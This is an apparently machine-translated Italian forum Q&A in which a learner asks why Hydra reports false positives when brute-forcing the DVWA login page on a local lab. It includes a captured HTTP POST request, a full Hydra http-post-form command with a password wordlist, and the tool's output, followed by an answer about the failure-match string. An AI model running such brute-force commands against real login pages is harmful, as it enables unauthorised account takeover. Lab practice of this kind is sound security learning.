Pagina di accesso DVWA a forza bruta con hydra

Naviga le tue risposte
0

Sto imparando come forzare le pagine di login web con uno strumento popolare di forza bruta chiamato "Hydra". Sto usando Kali Linux (VirtualBox) per fare questo. Ho installato DVWA (Damn Vulnerable Web Application) e lo sto eseguendo localmente.

NOTA: Sto cercando di forzare la forza /DVWA/login.php (la pagina di accesso DVWA effettiva) non /DVWA/vulnerabilities/brute/ (la sfida forza bruta)

Ecco le informazioni di Burp Suite 

POST /DVWA/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/DVWA/login.php
Cookie: security=impossible; PHPSESSID=72mh5pvdosgo98nmij6dha4min
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

username=e&password=e&Login=Login&user_token=5e093d39eb72145d6b0b2de187340825

Ho usato Burp Suite per intercettare la richiesta e ottenere le informazioni necessarie con Quelle informazioni ho costruito il seguente comando:

hydra -l admin -P /usr/share/dirb/wordlists/dvwa.txt localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

dvwa.txt è solo un file di testo con due password: password1 e password (la password corretta per il login è password). Quando ho eseguito idra è tornato con questo: 

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-06 09:48:12
[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking http-post-form://localhost:80//dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed
[ATTEMPT] target localhost - login "admin" - pass "password1" - 1 of 2 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "password" - 2 of 2 [child 1] (0/0)
[80][http-post-form] host: localhost   login: admin   password: password
[80][http-post-form] host: localhost   login: admin   password: password1
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-10-06 09:48:13

Questo risultato non è accurato, password1 non è una password valida, tuttavia la password è una password valida. Che cosa sto facendo di sbagliato? Ho modellato il mio comando in base a questo sito web .

Mi manca qualcosa? Ho notato che il sito sopra non ha messo localhost nei loro comandi ma piuttosto un IP? Sto eseguendo DVWA localmente sul mio computer, quindi metto localhost. Se potessi essere il più chiaro e dettagliato possibile, sarebbe fantastico! Sono nuovo di Hydra, Kali Linux e forcing bruto!

    
posta CoderPE 06.10.2018 - 20:39
fonte

1 risposta

0

Il controllo per cercare un login fallito è ciò che non funziona.

Nel link hai incluso il loro login fallito incluso "Login failed" da qualche parte nella risposta POST. Sto indovinando quando non riesci ad accedere al tuo login.php la stringa "Login fallito" non viene restituita nella risposta. Hai bisogno di capire esattamente viene restituito nel caso di una risposta non riuscita (e aggiornare il comando per cercarlo) o continuerai a ricevere questi falsi positivi.

Hai appena copiato l'ultima parte dell'esempio? :Login fauled

    
risposta data 06.10.2018 - 22:02
fonte

Leggi altre domande sui tag

Guida alla configurazione della migliore fonte di sicurezza Come riparare l'avvio del telefono solo nella modalità di avvio rapido dopo aver lampeggiato una ROM personalizzata?